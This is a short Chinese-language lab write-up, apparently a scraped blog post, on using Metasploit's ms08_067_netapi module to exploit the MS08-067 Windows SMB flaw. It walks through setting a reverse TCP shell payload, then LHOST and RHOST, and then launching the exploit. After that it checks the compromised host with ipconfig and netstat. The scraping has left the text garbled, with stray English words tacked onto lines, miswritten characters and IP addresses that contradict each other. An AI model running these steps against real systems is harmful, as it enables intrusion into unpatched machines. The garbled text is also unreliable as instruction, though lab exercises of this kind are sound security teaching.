windows攻擊實驗

###實驗目的:使用Metaspoit攻擊MS08-067,提交正確獲得遠程Shell過程的截圖(很多於5張)shell

####靶機:192.168.11.231windows

####攻擊機:192.168.11.131api

##實驗步驟: ####1.首先攻擊機和靶機互ping,在kali終端開啓msfconsole 網絡

####2.查找是否存在ms08_067漏洞,查看返回信息,會顯示出找到的滲透模塊tcp

####3.輸入命令use exploit/windows/smb/ms08_067_netapi,進入利用該漏洞模塊。接下來可輸入一些命令來顯示一些信息,如:操作系統

輸入show payloads會顯示出有效的攻擊載荷,好比shell_reverse_tcp

使用命令set payload generic/shell_reverse_tcp設置攻擊有效載荷

輸入show targets會顯示出能夠被攻擊的靶機的操做系統型號

####4.輸入show options顯示咱們須要在攻擊前須要設置的數據 code

####5.設置攻擊機和靶機地址,並使用命令show options再次查看payload狀態blog

輸入命令set LHOST + 攻擊機IP,即set LHOST 192.168.92.131;
輸入命令set RHOST + 靶機IP,即set RHOST 192.168.92.231;

####6.輸入命令exploit開始攻擊,下圖爲正常攻擊成功結果 ip

####7.在攻擊機和靶機中分別查看IP地址,輸入ipconfig/all,發現結果一致 get

####8.輸入「netstat -a」命令,能夠查看靶機開啓了哪些端口

####9.輸入「netstat -n」命令, 查看靶機端口的網絡鏈接狀況

相關文章
相關標籤/搜索